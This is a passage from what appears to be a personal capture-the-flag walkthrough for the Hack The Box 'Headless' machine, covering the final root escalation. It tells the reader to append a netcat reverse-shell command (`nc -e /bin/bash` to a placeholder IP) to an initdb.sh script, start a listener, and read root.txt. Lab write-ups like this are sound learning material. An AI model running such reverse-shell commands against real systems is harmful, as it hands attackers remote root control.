Zer0plusOne/HTB-Machines/HTB-Headless/Documentation(SPOILERS)/Warktrough-HeadLess.md

 - Modify `initdb.sh` to append: `nc -e /bin/bash xx.xx.xx.xx PORT`
 - Open a new terminal and use `nc -lvp PORT`
 - Execute the script

-> [!IMPORTANT]
-> **Please use this as a hint or guide if you're blocked at some point of this machine, i make those files for myself and to help some friends that are also doing those machines.**

-> [!NOTE]
-> **Try to get as far as you can by yourself or you will never learn to make machines alone.
-Hope you the best and happy hacking <3.**

-**Extra Hint:** Use the same process as for the user shell access

 **Result:** Access to a shell as the root user
 Navigate to the root directory and use `cat root.txt`